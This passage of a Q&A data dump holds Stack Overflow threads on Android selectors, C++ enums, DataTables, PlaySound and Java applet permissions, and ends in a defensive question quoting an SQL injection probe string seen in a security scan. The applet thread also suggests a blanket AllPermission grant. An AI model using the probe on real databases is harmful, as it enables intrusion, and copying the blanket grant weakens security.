15:36:07.256: E\/AndroidRuntime(15211): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:794)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:561)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at dalvik.system.NativeStart.main(Native Method)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): Caused by: android.view.InflateException: Binary XML file line #39: Error inflating class <unknown>\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.createView(LayoutInflater.java:606)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at com.android.internal.policy.impl.PhoneLayoutInflater.onCreateView(PhoneLayoutInflater.java:56)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.onCreateView(LayoutInflater.java:653)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.createViewFromTag(LayoutInflater.java:678)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.rInflate(LayoutInflater.java:739)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.rInflate(LayoutInflater.java:742)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.inflate(LayoutInflater.java:489)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.inflate(LayoutInflater.java:396)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.inflate(LayoutInflater.java:352)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at com.paktor.fragments.HomeVer3Fragment.onCreateView(HomeVer3Fragment.java:23)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.support.v4.app.Fragment.performCreateView(Fragment.java:1500)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.support.v4.app.FragmentManagerImpl.moveToState(FragmentManager.java:927)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.support.v4.app.FragmentManagerImpl.moveToState(FragmentManager.java:1104)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at 
android.support.v4.app.BackStackRecord.run(BackStackRecord.java:682)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.support.v4.app.FragmentManagerImpl.execPendingActions(FragmentManager.java:1467)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.support.v4.app.FragmentActivity.onStart(FragmentActivity.java:570)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at com.paktor.MainActivity.onStart(MainActivity.java:91)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.Instrumentation.callActivityOnStart(Instrumentation.java:1135)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.Activity.performStart(Activity.java:4740)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1933)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): ... 11 more\n12-09 15:36:07.256: E\/AndroidRuntime(15211): Caused by: java.lang.reflect.InvocationTargetException\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at java.lang.reflect.Constructor.constructNative(Native Method)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at java.lang.reflect.Constructor.newInstance(Constructor.java:417)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.view.LayoutInflater.createView(LayoutInflater.java:586)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): ... 30 more\n12-09 15:36:07.256: E\/AndroidRuntime(15211): Caused by: java.lang.StackOverflowError\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at java.lang.ref.FinalizerReference.add(FinalizerReference.java:48)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.XmlBlock$Parser.<init>(XmlBlock.java:78)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.XmlBlock.newParser(XmlBlock.java:71)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.Resources.loadXmlResourceParser(Resources.java:2128)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.Resources.loadDrawable(Resources.java:1918)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.Resources.getDrawable(Resources.java:664)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.graphics.drawable.StateListDrawable.inflate(StateListDrawable.java:173)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.graphics.drawable.Drawable.createFromXmlInner(Drawable.java:867)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.graphics.drawable.Drawable.createFromXml(Drawable.java:804)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.Resources.loadDrawable(Resources.java:1920)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.Resources.getDrawable(Resources.java:664)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.graphics.drawable.StateListDrawable.inflate(StateListDrawable.java:173)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.graphics.drawable.Drawable.createFromXmlInner(Drawable.java:867)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.graphics.drawable.Drawable.createFromXml(Drawable.java:804)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.Resources.loadDrawable(Resources.java:1920)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.content.res.Resources.getDrawable(Resources.java:664)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.graphics.drawable.\n<\/code>\nAnswer: You forgot the <code><selector><\/code>-tags:\n<code><?xml version=\"1.0\" encoding=\"utf-8\"?>\n<selector 
xmlns:android=\"http:\/\/schemas.android.com\/apk\/res\/android\" >\n<item android:drawable=\"@drawable\/icon_photo_selected\" android:state_checked=\"true\" \/>\n<item android:drawable=\"@drawable\/icon_photo_unselected\" android:state_checked=\"false\" \/>\n<\/selector>\n<\/code>\nI think this should fix your problem\nComment: maybe changing the `` to `` helps\nComment: otherwise have a look at following thread: http:\/\/stackoverflow.com\/a\/3576744\/995320\nComment: It's a mistake when I was copying my selector. selector tag was not missing.\nComment: still can't create drawable from xml. As I remember I have done it but now I can't. It's strangely\nComment: Sorry everyone. I have a mistake in one of selectors. Thank for your supports\nAnswer: Change your selector to:\n<code><?xml version=\"1.0\" encoding=\"utf-8\"?> \n<selector xmlns:android=\"http:\/\/schemas.android.com\/apk\/res\/android\"> \n<item android:drawable=\"@drawable\/icon_photo_selected\" android:state_checked=\"true\"><\/item> \n<item android:drawable=\"@drawable\/icon_photo_unselected\" android:state_checked=\"false\"><\/item> \n<\/selector>\n<\/code>\nThe selector tags seems to be missing\nComment: IS your code working for normal images other than 9-patch ones ?\n","meta":{"source":"stackoverflow","title":"Can not set a selector to background of RadioButton","dup_signals":{}},"subset":"stackexchange"} +{"text":"Pass empty string to constructor\n\nQuestion: note: I am still new to c++, and while this may be a simple issue, yet I am unable to find a solution.\nPurpose:\nI would like to pass an empty string (as one would in java\/C#) to my constructor. I receive an error:\n<code>error: no matching function for call to 'ReturnObject::ReturnObject(ResultCode::ClientCode, const char [1])'\n return new ReturnObject(ResultCode::ClientCode::enum_FailedOpeningClientSocket, \"\");\n<\/code>\nThe <code>ReturnObject<\/code>'s purpose is to encapsulate an <code>enum<\/code> and a <code>string<\/code>.\nWhat does this error mean and how can I solve it?\nI have attempted changing my constructor parameter from <code>QString data<\/code> to <code>char data<\/code> and calling with <code>''<\/code> but that resulted in an error <code>empty character constant<\/code>.\ncalling code:\n<code>return new ReturnObject(ResultCode::ClientCode::enum_FailedSocketConnection, \"\");\n<\/code>\nheader:\n<code>class ReturnObject\n{\npublic:\n ReturnObject(ResultCode enum_code, QString data);\n\n QString getData();\n ResultCode getCode();\n\nprivate:\n ResultCode e_code;\n QString data_string;\n\n};\n<\/code>\nimplementation\n<code>#include \"returnobject.h\"\n\nReturnObject::ReturnObject(){\n data_string=\"WARN\";\n}\n\nReturnObject::ReturnObject(ResultCode enum_code, QString data)\n : e_code(enum_code)\n , data_string(data)\n{}\n\nResultCode ReturnObject::getCode()\n{\n return e_code;\n}\n\nQString ReturnObject::getData()\n{\n return data_string;\n}\n<\/code>\nThanks to wasthishelpful and a few comments, I made a tragic logic error which had me looking at the wrong parameter, the solution is that I should casting my enum class <code>ResultCode<\/code> which is the parent class to one of the nested <code>class<\/code>es, in this case <code>ClientCode<\/code>, as seen below from my enum class header\nenum.h\n<code>#ifndef ENUMS_H\n#define ENUMS_H\n\nclass ResultCode{\npublic:\n enum class LoginDialogCode{\n enum_LoginSuccess=0,\n enum_InternetOffline=1,\n enum_ServerOffline=2,\n enum_InvalidLoginPass=3,\n enum_EmptyLoginPass=4,\n 
enum_FailedRetreivingServerList=5,\n enum_TokenFailed=6\n };\n\n enum class ClientCode{\n enum_SentSuccess=10,\n enum_FailedOpeningClientSocket=11,\n enum_FailedClientSocketConnection=12,\n enum_FailedWritingtoClientSocket=13,\n enum_FailedReadingfromClientSocket=14\n };\n\n enum class ServerCode{\n enum_ReceivedSuccess=20,\n enum_FailedOpeningListenSocket=21,\n enum_FailedBindingtoListenSocket=22,\n enum_FailedAcceptingListenSocket=23,\n enum_FailedWritingtoListenSocket=24,\n enum_FailedReadingfromListenSocket=25\n };\n};\n\n#endif \/\/ ENUMS_H\n<\/code>\nComment: You expect a `ResultCode` but you pass a `ClientCode`.\nComment: There is no constructor that takes a `ResultCode::ClientCode` parameter, but you've been so sure that the second parameter is the problem that you've ignored the first.\nComment: What is the type of `ResultCode::ClientCode::enum_FailedSocketConnection`?\nComment: @GillBates How foolish of me, thanks for pointing that out\nComment: @molbdnilo thank you, I did not see that!\nAnswer: Your error is not on the second, but on the first parameter. From your question, I guess you have code like this:\n<code>struct ReturnCode\n{\n enum class ClientCode\n {\n enum_FailedSocketConnection,\n \/\/ other values\n };\n};\n<\/code>\nSo you ended up with two declared types: <code>ReturnCode<\/code> and <code>ReturnCode::ClientCode<\/code>. Looking at your constructor declaration:\n<code>`ReturnObject::ReturnObject(ResultCode enum_code, QString data)`\n<\/code>\nIt needs an object of type <code>ReturnCode<\/code> as first parameter, while looking at your call:\n<code>ReturnObject(ResultCode::ClientCode::enum_FailedSocketConnection, \"\")\n<\/code>\nYou pass an object of type <code>ReturnCode::ClientCode<\/code> as first parameter.\nYou may change your code like this:\n<code>class ReturnObject\n{\npublic:\n ReturnObject(ResultCode::ClientCode enum_code, QString data);\n\n QString getData();\n ResultCode::ClientCode getCode();\n\nprivate:\n ResultCode::ClientCode e_code;\n QString data_string;\n\n};\n<\/code>\nOnce you are here. You may consider taking the enumeration out of <code>ResultCode<\/code>:\n<code>enum class ClientCode\n{\n enum_FailedSocketConnection,\n \/\/ other values\n};\n\nclass ReturnObject\n{\npublic:\n ReturnObject(ClientCode enum_code, QString data);\n\n QString getData();\n ClientCode getCode();\n\nprivate:\n ClientCode e_code;\n QString data_string;\n\n};\n<\/code>\nThis follows the Zen of Python: \"Flat is better than nested\". IMHO this is also true in C++.\nEDIT:\nFrom your comments, we're here on an XY problem, and your code needs to be redesign. 
Here is a first proposition:\n<code>#include <type_traits>\n\nenum class ClientCode{\n \/\/ ...\n enum_FailedClientSocketConnection=12,\n \/\/ ...\n};\n\ntemplate<typename T>\nstruct ReturnObject\n{\n static_assert(std::is_enum<T>::value, \"T should be an enum\");\n\n const T e_code;\n const QString data_string;\n};\n\ntemplate<typename T>\nReturnObject<T> make_return_object(T e_code, std::string data_string)\n{\n return ReturnObject<T>{e_code, data_string};\n}\n\n\/\/ usage\n\nreturn make_return_object(\n ClientCode::enum_FailedClientSocketConnection, \"\"\n);\n<\/code>\nI removed the accessors <code>getData<\/code> and <code>getCode<\/code> for public const members: they are just read, and should not change for a given return object, so let them be public, with the const qualifier to prevent modification.\nI used templates to represent the code, with <code>static_assert<\/code> to check the given type is an enumeration.\nThe drawbacks are:\n\nYou can pass any enumeration, not only your result codes.\n<code>make_return_object<\/code> will return a different type for each different enumeration.\nComment: That should **NOT** be a cast :) You are here in a wrong design. I will propose you an answer, but I can't today\nComment: Hell yeah ! Thanks. One question though, you are almost correct with your derived code, see my update, I have a nested enum. I need cast my `ResultCode::enum_FailedOpeningClientSocket` as a `ResultCode::ClientCode` object. How should this be done, rather which should I use, dynamic or static?\nComment: Neither `dynamic_cast` nor `static_cast`: a nested type is not related to its \"nesting\" type and there can **not** be cast between them, as you could have when using inheritance. The nesting type acts here like a namespace with `private` and `protected` options. Why do you need `ResultCode`? Unless you want to pass any enum nested in `ResultCode`as argument to your functions, but I can't see the point here: if you need a `ClientCode`, you should not allow to pass anything else, and the way to do that is to declare the argument as a `ClientCode`\nComment: infact that is exactly why I need `ResultCode`, since I will using this ReturnObject in a few different classes, I require a class that I can insert any enum from `ResultCode` and a supporting string\/(char array). I just realized I do not require `ResultCode` as a `enum` but as a `struct` as you pointed out. But since I can insert any `enum` from `ResultCode`, I am required to typecast it do the appropriate `enum class`. That is what I am refering to, should this be a normal cast like `(ResultCode::ClientCode)ResultCode::ClientCode::enum_Failed...`. I am testing this now...\nComment: Thank you for the trouble, I have resorted to combining all enums into one class, for the moment. I eagerly await your proposed solution\/new design, I would love to get a fresh opinion on this!\nComment: I edited my answer with a first proposition. I guess it will be incomplete for you, but, without details on how you're using `ReturnObject`, your question is too broad. Maybe you will need a real type erasure like `variant`, or `any`. Feel free to edit your question with a complete use case\n","meta":{"source":"stackoverflow","title":"Pass empty string to constructor","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to find the minimum value of one variable in two functions using Mathematica?\n\nQuestion: How do I find the minimum value which satisfies the two equation below by using Mathematica? 
<code>d<\/code> and <code>w<\/code> in these equations are constant. The only variable is <code>a<\/code>.\n<code>y=-5 a^3 \ny=-a ((5 w d^2)\/4 + 5 w d) + (5 w d^2)\/2\n<\/code>\nI typed this into Mathematica but it is not working\n<code>MinValue[{-5 a w^2, (5 w d^2)\/2 - a (5 w d + (5 w d^2)\/4)}, {a}]\n<\/code>\nAnswer: If I understand your question, what you want to minimize is the value of <code>a<\/code> subject to the constraint of the equations. If so, the correct syntax is\n<code>MinValue[{a, -5 a w^2 == (5 w d^2)\/2 - \n a (5 w d + (5 w d^2)\/4)}, {a}] \/\/ Simplify\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"How to find the minimum value of one variable in two functions using Mathematica?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can I embed a silverlight sketchflow player in my web page?\n\nQuestion: Hi I'm new to silverlight and sketchflow. I'm getting on great with creating prototypes and can export to Word etc.\nI would really like to embed a prototype in another web page - is this possible and how would I go about it?\nThanks\nAnswer: Yes you can. The Silverlight SketchFlow player is a Silverlight application just like any other. \nHere is an msdn page about it:\nhttp:\/\/msdn.microsoft.com\/en-us\/library\/cc838145%28VS.95%29.aspx\nI also believe Expression Web has the ability to embed a SL project into a webpage for you if you aren't comfortable with html.\nAlso, 1 more option to explore is the package item on the file menu.\nAnswer: It's very easy.\n\nCreate you sketch flow app in Expression Blend.\nIn Visual Studio add an empty ASP.Net Website to the solution\nIn the properties of the ASP.Net Website, find the Silverlight tab. There you press Add and when happy with all the default settings, press add again. \n\nYou are good to go. You can host the Sketch Flow Player online, for you audience to start giving you the feedback ;)\n","meta":{"source":"stackoverflow","title":"Can I embed a silverlight sketchflow player in my web page?","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to grant permission to my applet\n\nQuestion: My applet gave me an access denied (<code>java.net.socket.Persmission<\/code>) ERROR just when I changed URL from <code>localhost:8090\/Project\/map.jsp<\/code> to <code>10.1.1.27:8090\/Project\/map.jsp<\/code> or when I tried to connect from another computer.\nso I looked for a solution and I found that I need to grant my applet Permission in file named java.policy at <code>C:\\Program Files (x86)\\Java\\jre1.8.0_40\\lib\\security<\/code>\nlike this:\n <code><< grant { permission java.security.AllPermission;}; >><\/code>\nbut it didn't work for me and I want to know why and how to specific my own applet with those permission.\nComment: Out of curiosity: what are using your applet for?\nComment: it's connected to a DB using a servlet and change the info to a graphic (position of trucks in the company's parking)\nComment: Is there a hard requirement to run your \"application\" in a browser? Because if not - you might simple **not** use an applet.\nComment: I didn't understand what did u mean by requirement ( hardware or codes)\nComment: I mean: what is the reason that you want to use Java applets?\nComment: The applet will need to be digitally signed prior to deployment so you might as well add signing to the build script. Editing policy files is pointless. 
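(That said, if someone does want to scope a grant to one applet instead of granting everything, the usual shape is a codeBase entry - hedged, since the exact URL has to match wherever the jar is actually served from, e.g. <code>grant codeBase \"http:\/\/10.1.1.27:8090\/Project\/-\" {\n permission java.net.SocketPermission \"10.1.1.27:8090\", \"connect,resolve\";\n};\n<\/code> saved as .java.policy in the user home directory, as described in the answer below.) 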
BTW - does the applet open a socket connection to it's own server (the one that supplied the applet to the user)?\nAnswer: Go to command line and type policytool it will open editor to create policy file now add permissions on policy file whatever you like and save file with name .java.policy in user home directory. It will be enough to provide permission to your applet.\nComment: can explain more because this my 1st time with applets\nComment: It is simple as I mentioned in steps, Just run policytool and add permission there is lot of permission when you run the tool you will get understand they are simple. finally use file menu save the policy in file just to remember that your file name should be .java.policy and location should be your user home directory.\nComment: If you want to grant all permission than copy this text in your policy file - grant {\n permission java.security.AllPermission;\n};\nComment: I knew this one, but I want to specify my own applet by this code not all applets when I added < grant codebase\"http:\/\/localhost:8090\/ProjectStage\/applet.jar\" { permission java.security.AllPermission; } it didn't work for me\n","meta":{"source":"stackoverflow","title":"how to grant permission to my applet","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to show custom table row() when there is no data(initial and after searching) in data-tables | datatables | jQuery\n\nQuestion: I am using data tables in my project and using the ajax option to fetch the data for the data table but I want to show the custom table row in case of the empty table, and different table row in case of no records after perform searching.\n<code>$('#clients-list-table').DataTable({\n \"processing\": true,\n \"lengthChange\": false,\n \"pageLength\": 10,\n \"ajax\": {\n \"url\": SITE_URL + \"\/clients\",\n \"contentType\": \"application\/json\",\n \"type\": \"GET\"\n },\n \"columns\": [\n { \"data\": \"name\" },\n { \"data\": \"email\" },\n { \"data\": \"tax_id\", \"searchable\": false, \"orderable\": false },\n { \"data\": \"phone\", \"searchable\": false, \"orderable\": false },\n {\n \"orderable\": false,\n \"searchable\": false,\n \"data\": null,\n \"defaultContent\": \"\",\n \"mRender\": function ( data, type, row ) {\n actionTd = '<i class=\"fa fa-sort-desc action-btn\" class=\"dropdown-toggle\" data-toggle=\"dropdown\"><\/i>';\n actionTd += '<div class=\"dropdown-menu\"><ul>';\n actionTd += '<li><a href=\"javascript:void(0);\">View<\/a><\/li>';\n actionTd += '<li><a href=\"'+SITE_URL+'\/clients\/'+data.id+'\/edit\">Edit<\/a><\/li>';\n actionTd += '<li><a class=\"delete_resource\" data-resource=\"destroy-client-form-'+data.id+'\" href=\"'+SITE_URL+'\/clients\/'+data.id+'\">Delete<\/a><form method=\"POST\" action=\"'+SITE_URL+'\/clients\/'+data.id+'\" accept-charset=\"UTF-8\" id=\"destroy-client-form-'+data.id+'\" style=\"display: none\"><input name=\"_method\" type=\"hidden\" value=\"DELETE\"><input name=\"_token\" type=\"hidden\" value=\"'+$('meta[name=\"csrf-token\"]').attr('content')+'\"><\/form><\/li>';\n actionTd += '<\/ul><\/div>';\n return actionTd;\n }\n },\n ],\n render: function ( data, type, row, meta ) {\n console.log(data.length);\n },\n rowCallback: function (row, data) {\n console.log(data);\n },\n \"oLanguage\": { \n \"sZeroRecords\": '<div class=\"message\"><p>You have not yet create a new client!<\/p><\/div><div class=\"invoice-btns\"><a href=\"'+SITE_URL+'\/clients\/create\" class=\"btn-custom\"><i class=\"fa fa-plus\" aria-hidden=\"true\"><\/i> New Client <\/a><\/div>' 
\n }\n});\n<\/code>\nCurrent HTML showing the following table row by using the above sZeroRecords option\n<code><tr class=\"odd\">\n <td valign=\"top\" colspan=\"5\" class=\"dataTables_empty\">\n <div class=\"message\"><p>You have not yet create a new client!<\/p><\/div>\n <div class=\"invoice-btns\"><a href=\"http:\/\/localhost\/kedas\/clients\/create\" class=\"btn-custom\"><i class=\"fa fa-plus\" aria-hidden=\"true\"><\/i> New Client <\/a><\/div>\n <\/td>\n<\/tr>\n<\/code>\nBut I want to show the following HTML in case of no record\n<code><tr class=\"no-data-row\">\n <td colspan=\"7\" rowspan=\"2\" align=\"center\">\n <div class=\"message\"><p>You have not yet create a new client!<\/p><\/div>\n <div class=\"invoice-btns\">\n <a href=\"'+SITE_URL+'\/clients\/create\" class=\"btn-custom\"><i class=\"fa fa-plus\" aria-hidden=\"true\"><\/i> New Client <\/a>\n <\/div>\n <\/td>\n<\/tr>\n<\/code>\nAfter perform Searching it showing the same but I want to show some different table row like below\n<code><tr class=\"no-search-data\">\n <td colspan=\"7\" rowspan=\"2\" align=\"center\">\n <div class=\"message\"><p>There is no records match with your searchin<\/p><\/div>\n <\/td>\n<\/tr>\n<\/code>\nAnswer: Actually you were pretty close. Look at my example:\n\n<code>var jsonData = [\n { \n \"Name\": \"Tiger Nixon\",\n \"Position\": \"System Architect\",\n \"Office\": \"Edinburgh\",\n \"Age\": 61,\n \"StartDate\": \"2011\/04\/25\",\n \"Salary\": \"$320,800\"\n },\n { \n \"Name\": \"Garrett Winters\",\n \"Position\": \"Accountant\",\n \"Office\": \"Tokyo\",\n \"Age\": 63,\n \"StartDate\": \"2011\/07\/25\",\n \"Salary\": \"$170,750\"\n },\n { \n \"Name\": \"Ashton Cox\",\n \"Position\": \"Junior Technical Author\",\n \"Office\": \"San Francisco\",\n \"Age\": 66,\n \"StartDate\": \"2009\/01\/12\",\n \"Salary\": \"$86,000\"\n }\n];\n\nvar jsonData2 = []\n\nvar table = $('#example').DataTable({\n processing: true,\n lengthChange: false,\n pageLength: 10,\n language: {\n \/\/zeroRecords: '<div class=\"fa-3x\"><i class=\"fas fa-cog fa-spin\"><\/i><\/div>',\n \/\/emptyTable: '<div class=\"fa-3x\"><i class=\"fas fa-spinner fa-spin\"><\/i><\/div>'\n \/\/ zeroRecords: '<div class=\"message\"><p>There is no records match with your searchin<\/p><\/div>'\n },\n data: jsonData2, \/\/ replace with jsonData for records\n drawCallback: function( settings ) {\n var api = this.api();\n var searchText = api.search();\n var currentPageDataSet = api.rows( {page:'current'} ).data();\n\n if (searchText != '' && currentPageDataSet.length == 0) {\n var $tbody = $('#example tbody');\n $tbody.empty();\n var $tr = $('<tr class=\"no-search-data\" role=\"row\"><\/tr>'); \n $tr.append('<td colspan=\"5\" rowspan=\"2\" align=\"center\"><div class=\"message\"><p>There is no records match with your searching<\/p><\/div><\/td>');\n $tbody.append($tr); \n } else if (currentPageDataSet.length == 0) {\n var $tbody = $('#example tbody');\n $tbody.empty();\n var $tr = $('<tr role=\"row\" class=\"no-data-row\"><\/tr>'); \n $tr.append('<td colspan=\"5\" rowspan=\"2\" align=\"center\"><div class=\"message\"><p>You have not yet create a new supplier!<\/p><\/div><div class=\"invoice-btns\"><a href=\"#\" class=\"btn-custom\"><i class=\"fa fa-plus\" aria-hidden=\"true\"><\/i> New Client <\/a><\/div><\/td>');\n $tbody.append($tr);\n }\n },\n columns: [\n { data: 'Name' },\n { data: 'Position' },\n { data: 'Office' },\n { data: 'Age' },\n { data: 'StartDate' },\n { data: 'Salary' }\n ]\n});<\/code>\n<code><link 
href=\"https:\/\/cdn.datatables.net\/1.10.21\/css\/jquery.dataTables.min.css\" rel=\"stylesheet\"\/>\n<link href=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/font-awesome\/5.14.0\/css\/all.min.css\" rel=\"stylesheet\"\/>\n\n<script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/jquery\/1.12.4\/jquery.min.js\"><\/script>\n<script src=\"https:\/\/cdn.datatables.net\/1.10.21\/js\/jquery.dataTables.min.js\"><\/script>\n\n<table id=\"example\" class=\"display\" style=\"width:100%\">\n <thead>\n <tr>\n <th>Name<\/th>\n <th>Position<\/th>\n <th>Office<\/th>\n <th>Age<\/th>\n <th>Start date<\/th>\n <th>Salary<\/th>\n <\/tr>\n <\/thead>\n<\/table>\n<br><br>\n<table id=\"example2\" class=\"display\" style=\"width:100%\">\n <thead>\n <tr>\n <th>Name<\/th>\n <th>Position<\/th>\n <th>Office<\/th>\n <th>Age<\/th>\n <th>Start date<\/th>\n <th>Salary<\/th>\n <\/tr>\n <\/thead>\n<\/table><\/code>\nComment: Can you please tell me how can I change the class of empty tr? As I need but it coming as \nComment: @SachinKumar: I'm sorry. I misunderstood your issue. I edited my example. Could you check it out, please?\nComment: I think you should use the condition something like this \n\nif (searchText != '' && currentPageDataSet.length == 0) {\n ...\n} else if (currentPageDataSet.length == 0) {\n ...\n}\nComment: Any way you do a great job. At least tell me the useful option for the data table.\nComment: @SachinKumar: The problem if I use your proposed condition, how would you know which class (**no-search-data** or **no-data-row**) to inject to the tag?\nComment: No look at your condition you just check if the search input is not empty then simply show the tr. but what about after searching you have some records. It means according to your condition it will always show the same result(empty tr) even there are some records to show after searching.(#example2 example)\n","meta":{"source":"stackoverflow","title":"How to show custom table row() when there is no data(initial and after searching) in data-tables | datatables | jQuery","dup_signals":{}},"subset":"stackexchange"} +{"text":"PlaySound works in Visual Studio but not in standalone exe\n\nQuestion: I am trying to play a wav file in C++ using Visual Studio.\nI put file \"my.wav\" in my project directory and use the code\n<code>PlaySound(TEXT(\"my.wav\"), NULL, SND_FILENAME | SND_SYNC);\n<\/code>\nI hit the play button (or F5 or even Ctrl-F5) and it plays the sound fine.\nI open a command prompt and go to Debug\/ and run MyApp.exe and when it runs it plays the error chime.\nNote: Ideally the sound would be bundled in the exe so I can just distribute the exe and it would work. I tried putting it in an Resource.rc but the code I see in all the examples\n<code>PlaySound( (char*)IDR_WAVE1, NULL, SND_RESOURCE | SND_SYNC );\n<\/code>\ndoesn't even compile for me. Complains about IDR_WAVE1 even though that is the name of my resource.\nComment: You are using a relative path (*\"my.wav\"*). The current working directory set by Visual Studio is different from the current working directory, when launched from a command prompt. Either bundle the WAV as a resource, or use fully qualified paths.\nComment: Isn't `IDR_WAVE1` just an integer identifying a resource?\nComment: Are you sure you are doing this [how it should be done](https:\/\/msdn.microsoft.com\/en-us\/library\/windows\/desktop\/dd743679(v=vs.85).aspx)?\nComment: Link it as a resource. Don't just try to do that, fail, give up, and adopt a much worse solution. Linking files as resources is easy.\nComment: @wix. 
I had tried to follow that resource you mention, but ended up with the described behavior. I then found three other examples on the internet (all mostly similar but slightly different) and tried to mimic those, with no better results. So, no, I am quite sure I am not doing this how I should. That's why I put it on Stack Overflow.\nAnswer: As I recall it you need to 'link' the resource file with a resource script file \".rc file\" in Visual Studio to embed it inside the .exe file. Otherwise you need to load it like @wilx points out.\nAnswer: I'm a little rusty on old school win32 but it was something like this:\ninclude resource.h in your file and use MAKEINTRESOURCE\n<code>PlaySound(MAKEINTRESOURCE(IDR_WAVE1), NULL, SND_RESOURCE | SND_SYNC );\n<\/code>\nComment: I had tried that already, but tried it again after your answer and realized my mistake. I actually had two resource files (because I'm clueless to Visual Studio) and including resource.h wasn't helping because I needed to include resource1.h. I collapsed my two resource files to one and it works now as a resource.\nComment: Technically, IInspectable is the one who answered by original question of why it doesn't work when run as .exe, but he answered it as a comment and you solved my problem, so marking yours as the correct solution.\n","meta":{"source":"stackoverflow","title":"PlaySound works in Visual Studio but not in standalone exe","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to reset all states when property value is changed from javascript?\n\nQuestion: I am using stencil framework. In my component I am using different states to trigger different events. I am also updating the property value of component from javascript. \nI would like to reset all states value and reload the component with updated property value. \nNew property value is responsible for many actions like calling api, generating the cache key etc.\nCan anyone suggest me the best approach to fulfill my requirement. Currently I am reset all the states in watcher method of property and call the componentWillLoad event but I am facing many issue in this approach.\nSample code\n<code>@Prop() symbol!: string;\n @Watch('symbol')\n symbolChanged(newSymbol: string, prevSymbol: string) {\n if (newSymbol && newSymbol !== prevSymbol) {\n this.resetStates();\n }\n }\n resetStates() {\n \/\/Reset all state values here\n this.componentWillLoad();\n }\n<\/code>\nComment: Sounds to me like you're trying to put too much logic into that component. Anyway, maybe it's easier to create a new component instance when the value changes? You can use a different `key` on your component to make sure the old one doesn't get reused (for info about `key` see https:\/\/stenciljs.com\/docs\/templating-jsx#loops).\nComment: @SimonH\u00e4nisch by setting key property on each symbol change would work for me. 
Thank you very much for your suggestion.\nAnswer: By setting key property on root element of render method would solve my issue like below code snippet.\n<code> uniqKeyId = uniqid.get();\n\n @Prop() symbol!: string;\n @Watch('symbol')\n sysmbolWatcher(newSymbol: string, prevSysmbol: string) {\n if (newSymbol != prevSysmbol) {\n \/\/update key attribute each switch of exchange\n this.uniqKeyId = uniqid.get();\n \/\/Set default values based on properties as to consider this as fresh request.\n this.setDefaultValues();\n }\n }\n<\/code>\nAnd in render method like below \n<code> render() { \n return ( \n <section class=\"cid-minichart\" key={this.uniqKeyId}>\n \/\/Render markup\n <\/section>\n );\n }\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to reset all states when property value is changed from javascript?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I prevent this type of SQL injection attack?\n\nQuestion: Our company has been using several tool (Veracode, Appscan, etc) to verify that our applications meet minimum security requirements. I have inherited a legacy application which has several flaws. I've managed to mitigate most of the vulnerabilities, but am having troubles fixing this next one because I simply do not know what it is doing. In our report, it seems that it is changing one of our POST variables to\n<code>25%27+having+1%3D1--+\n<\/code>\nWhat is this and what is it effectively doing? What can I do to prevented by this type of attack?\nComment: parametrized quires, like every other sql injection ever.\nComment: If you want the least amount of work to resolve this (or any) vulnerability, toggle the system's oh-enn\/oh-eff-eff discriminator.\nComment: Normally, I would, but this is a very old application that we do not plan on having around much longer. Time I spend on this application is basically a waste of time at this point, so the bare minimum work possible is 